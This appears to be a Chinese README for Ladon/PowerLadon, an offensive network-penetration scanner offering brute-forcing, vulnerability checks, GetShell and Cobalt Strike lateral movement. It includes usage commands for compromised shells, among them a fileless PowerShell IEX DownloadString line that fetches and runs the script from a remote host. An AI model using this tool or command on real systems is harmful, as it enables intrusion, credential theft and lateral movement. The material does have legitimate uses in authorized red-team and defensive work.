程序簡介
Ladon一款用於大型網絡滲透的多線程插件化綜合掃描神器,含端口掃描、服務識別、網絡資產、密碼爆破、高危漏洞檢測以及一鍵GetShell,支持批量A段/B段/C段以及跨網段掃描,支持URL、主機、域名列表掃描。5.5版本內置39個功能模塊,通過多種協議以及方法快速獲取目標網絡存活主機IP、計算機名、工作組、共享資源、網卡地址、操作系統版本、網站、子域名、中間件、開放服務、路由器、數據庫等信息,漏洞檢測包含MS17010、Weblogic、ActiveMQ、Tomcat、Struts2等,密碼爆破11種含數據庫(Mysql、Oracle、MSSQL)、FTP、SSH(Linux主機)、VNC、Windows密碼(IPC、WMI、SMB)、Weblogic后台、Rar壓縮包密碼等,Web指紋識別模塊可識別75種(Web應用、中間件、腳本類型、頁面類型)等,可高度自定義插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等語言編寫的插件,支持通過配置INI批量調用任意外部程序或命令,EXP生成器可一鍵生成漏洞POC快速擴展掃描能力。Ladon支持Cobalt Strike插件化掃描快速拓展內網進行橫向移動。
使用說明
| ID | 主題 | URL |
|---|---|---|
| 1 | Ladon文檔主頁 | https://github.com/k8gege/Ladon/wiki |
| 2 | 基礎用法詳解 | https://github.com/k8gege/Ladon/wiki/Ladon-Usage |
| 3 | Cobalt Strike | https://github.com/k8gege/Ladon/wiki/Ladon-&-Cobalt-Strike |
| 4 | Exp生成器使用 | https://github.com/k8gege/Ladon/wiki/LadonExp-Usage |
| 5 | 高度自定義插件 | https://github.com/k8gege/Ladon/wiki/Ladon-Diy-Moudle |
| 6 | 外部模塊參考 | https://github.com/k8gege/K8CScan/wiki |
| 7 | PowerLadon | https://github.com/k8gege/Ladon/wiki/Ladon-&-PowerShell |
| 8 | PythonLadon | https://github.com/k8gege/PyLadon |
| 9 | LinuxLadon | https://github.com/k8gege/LinuxLadon |
| 10 | 漏洞演示視頻 | https://github.com/k8gege/K8CScan/tree/master/Video |
PowerLadon
PowerLadon完美兼容win7-win10 PowerShell,對於不支持.net程序插件化的遠控,可使用
PowerShell版,也可CMD命令行下遠程加載內存實現無文件掃描,模塊加載后用法和EXE一致。
Ladon.ps1腳本由EXE轉換而成,具備EXE版所有功能,相關功能使用請查看Ladon說明文檔。
下載
最新版本 https://github.com/k8gege/Ladon
歷史版本 https://github.com/k8gege/PowerLadon
0x001 PowerShell本地加載
適用於支持PowerShell交互遠控或Shell,如Cobalt Strike
> powershell
> Import-Module .\Ladon.ps1
> Ladon OnlinePC
0x002 Cmd本地加載
適用於還沒跟上時代的遠控或Shell只支持CMD交互
> powershell Import-Module .\Ladon.ps1;Ladon OnlinePC
0x003 Cmd遠程加載
適用於還沒跟上時代的遠控或Shell只支持CMD交互
> powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.5:800/Ladon.ps1'); Ladon OnlinePC"
